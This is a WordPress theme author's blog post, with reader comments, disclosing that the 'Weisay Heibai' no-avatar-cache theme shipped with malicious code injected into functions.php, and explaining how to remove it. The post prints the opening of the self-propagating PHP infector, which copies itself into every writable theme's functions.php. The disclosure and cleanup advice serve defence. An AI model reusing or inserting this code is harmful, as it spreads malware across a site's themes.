今天朋友说我的主题(『Weisay Heibai』无缓存头像版)中的functions.php被插入了恶意代码,我感到非常的震惊,赶紧下载打开查证,果然发现了恶意代码,现在我已经删掉了此段恶意代码,主题包也已经更新过了,请下载使用过的朋友赶紧删除主题文件夹下面的functions.php,重新下载我新上传主题包中的functions.php。
这段代码会感染主题文件夹下的其他主题,可能会把这段代码复制到其他主题的functions.php下面,所以很抱歉,大家要修正不仅仅是『Weisay Heibai』无缓存头像版,还有你主题文件夹下的其他主题,请使用的朋友特别注意检查下,看有没有问题,我深感抱歉。
WordPress黑白主题『Weisay Heibai』我发布2个版本,『Weisay Heibai』无缓存头像版 是我后来发布的版本,开始使用的人可能不知道,『Weisay Heibai』缓存头像版是没有问题的,只有『Weisay Heibai』无缓存头像版 有问题。
前几天帮人家修改了主题,可能导致这个问题的发生,开始我也不知道竟然还有这个东东,感谢zwwooooo的提醒。
希望用过我主题的朋友,都检查下主题的functions.php,看看其中有没有类似这段,这段恶意代码很长,我截取前面一段。
function _verifyactivate_widgets(){ $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed=""; $output=strip_tags($output, $allowed); $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6))); if (is_array($direst)){ foreach ($direst as $item){ if (is_writable($item)){ $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"(")); $cont=file_get_contents($item); if (stripos($cont,$ftion) === false){ $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">"; $output .= $before . "Not found" . $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f); $output .= ($isshowdots && $ellipsis) ? "..." : ""; } } } }
我主题正常的functions.php在
add_filter('the_content', 'password_hint'); //全部设置结束 ?>
之后就结束了,后面还有其他代码的话就说明有问题了。
希望使用我主题的朋友都检查下,再次深感抱歉,以后我会严格检查我的主题的。
本文固定链接: https://www.weisay.com/blog/weisay-heibai-no-gravatar-cache-update.html | 威言威语
表示我中了,删不掉,一直感染其他主题,后来还是删除了
只传functions.php行吗
@javis可能其他主题会被感染,只修改一个不一定确保所以的都正常,你可以先试试。
@William其他主题已经悲剧了,都改了,只改这个文件有用吗,会不会还有哪儿有
@javis貌似只会感染functions.php。你删除每个主题的functions.php里面的感染代码应该也可以。
@William谢啦。我也不知道这个代码是哪来的。
lz问下,我把后面那段直接删了,行不?还有我是今天刚下载的黑白,还是有这段代码。
@javis刚刚又下载看了下,是正常的,建议你删掉主题文件夹里面的全部主题,然后重新上传主题。
@William好狠,要全删。。我改了很多了
我想问下,我用了Comment Info Detector插件,就是和你的show-useragent是同种插件,但我的却无法显示用户信息,是我换了主机后才这样的,楼主能不能帮忙呢,我对权限设置方面不懂
@黑涩的猪没有用过这个Comment Info Detector,要不你用show-useragent,挺好的
@William正准换呢,今天主机抽了,没法换…
威武!
尽职尽责,而且我也是用了HeiBai….呵呵
下载了你设计的这款主题,可是头像怎么都显示不出来,请问可能是什么原因呢?谢谢!
@snailmanhttps://www.weisay.com/blog/wordpress-theme-weisay-heibai.html
请仔细看文章的第一点使用说明。
LZ我想问一下,黑白主题怎么显示文章中得图片啊。我发现自己插入图片后,首页还是随机图片
@LeoPure要在后台主题设置中开启从文章中截取图片
那个“WordPress黑白主题『Weisay Heibai』我发布2个版本,『Weisay Heibai』无缓存头像版 是我后来发布的版本,开始使用的人可能不知道,『Weisay Heibai』缓存头像版是没有问题的,只有『Weisay Heibai』无缓存头像版 有问题。”
连接貌似给错了~
@Hank↗没错啊,正确的